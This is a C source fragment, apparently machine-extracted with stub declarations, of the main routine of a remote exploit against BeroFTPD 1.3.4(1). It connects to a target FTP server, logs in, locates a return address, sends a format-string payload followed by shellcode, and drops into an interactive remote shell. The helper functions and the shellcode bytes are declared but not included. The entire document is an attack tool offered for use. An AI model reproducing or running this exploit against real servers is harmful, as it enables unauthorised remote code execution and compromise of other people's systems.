
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {char* descr; scalar_t__ enbuf; } ;


 int EOF ;
 void* atoi (int ) ;
 scalar_t__ bufaddr ;
 int conn2host (char*,int) ;
 unsigned char* fmtstr ;
 int fmtstr_build (scalar_t__,int ) ;
 int getopt (int,char**,char*) ;
 int login () ;
 int memset (char*,int ,int) ;
 void* offset ;
 int optarg ;
 int printf (char*,...) ;
 int recv (int ,char*,int,int ) ;
 int retloc ;
 int retloc_find () ;
 size_t sel ;
 int send (int ,unsigned char*,size_t,int ) ;
 int shellami (int ) ;
 unsigned char* shellcode ;
 unsigned char* shellcode_read ;
 int sleep (int) ;
 int sock ;
 char* strdup (int ) ;
 size_t strlen (unsigned char*) ;
 TYPE_1__* target ;
 scalar_t__ tmpaddr ;
 int usage (char*) ;

main(int argc, char *argv[])
{
char rbuf[1024];
char *host = ((void*)0);
int cnt;

  printf("\n  BeroFTPD 1.3.4(1) exploit by qitest1\n\n");
  if(argc == 1)
 usage(argv[0]);
  while((cnt = getopt(argc,argv,"h:t:o:")) != EOF)
    {
   switch(cnt)
        {
   case 'h':
      host = strdup(optarg);
      break;
   case 't':
     sel = atoi(optarg);
     break;
   case 'o':
     offset = atoi(optarg);
     break;
   default:
     usage(argv[0]);
     break;
        }
    }

  if(host == ((void*)0))
 usage(argv[0]);

  printf("+Host: %s\n  as: %s\n", host, target[sel].descr);

  printf("+Connecting to %s...\n", host);
  sock = conn2host(host, 21);
  printf("  connected\n");

  printf("+Receiving banner...\n");
  recv(sock, rbuf, 1024, 0);
  printf("%s", rbuf);
  memset(rbuf, 0, 1024);
  printf("  received\n");

  printf("+Logging in...\n");
  login();
  printf("  logged in\n");

  printf("+Searching retloc...\n");
  retloc_find();
  printf("  found: %p\n", retloc);

  printf("+Searching bufaddr...\n");
  bufaddr = tmpaddr + target[sel].enbuf;
  printf("  found: %p + offset = ", bufaddr);
  bufaddr += offset;
  printf("%p\n", bufaddr);

  printf("+Preparing shellcode...\n");
  shellcode_read[strlen(shellcode_read)] = (unsigned char) strlen(shellcode);
  printf("  shellcode ready\n");

  printf("+Building fmtstr...\n");
  fmtstr_build(bufaddr, retloc);
  printf("  fmtstr builded\n");

  printf("+Sending fmtstr...\n");
  send(sock, fmtstr, strlen(fmtstr), 0);
  printf("  fmtstr sent\n");
  recv(sock, rbuf, 1024, 0);
  sleep(1);
  send(sock, shellcode, strlen(shellcode), 0);
  sleep(2);
  printf("+Entering love mode...\n");
  shellami(sock);

}
